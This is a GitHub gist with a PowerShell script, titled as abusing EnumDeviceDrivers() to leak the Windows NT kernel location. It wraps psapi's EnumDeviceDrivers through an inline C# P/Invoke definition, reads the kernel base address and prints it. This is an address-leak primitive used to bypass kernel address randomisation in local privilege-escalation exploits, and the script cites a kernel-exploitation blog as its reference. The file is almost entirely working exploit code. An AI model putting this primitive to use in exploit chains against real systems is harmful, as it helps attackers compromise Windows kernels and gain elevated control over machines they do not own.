Created
September 26, 2023 03:16
-
-
Save aaaddress1/0ee14150c52905ebe0b0bb7892cb3412 to your computer and use it in GitHub Desktop.
Abuse EnumDeviceDrivers() to leak the location of Windows NT Kermel
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -TypeDefinition @" | |
| // ref: http://showlinkroom.me/2020/10/16/WindowKernelExploit01/ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Principal; | |
| public static class EVD2 | |
| { | |
| [DllImport("kernel32.dll")] | |
| public static extern uint GetLastError(); | |
| [DllImport("psapi")] | |
| public static extern bool EnumDeviceDrivers( | |
| [MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] UInt64[] ddAddresses, | |
| UInt32 arraySizeBytes, | |
| [MarshalAs(UnmanagedType.U4)] out UInt32 bytesNeeded | |
| ); | |
| } | |
| "@ | |
| Function LeakBaseAddress(){ | |
| $dwByte = 0 | |
| $status=[bool] [EVD2]::EnumDeviceDrivers(0, 0, [ref]$dwByte) | |
| if(!$status){ | |
| echo $("[*] Unable to enum device.... with error 0x{0:x}`n" -f [EVD2]::GetLastError()) | |
| } | |
| $ptrAddress = [Uint64[]](9)*0x1000 | |
| $status=[bool] [EVD2]::EnumDeviceDrivers([UInt64[]]$ptrAddress, $dwByte+10, [ref]$dwByte) | |
| # echo $("Address is {0:x}" -f $ptrAddress[0]) | |
| return $ptrAddress[0] | |
| } | |
| $leakAddress = LeakBaseAddress | |
| echo $("Address is {0:x}" -f $leakAddress) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment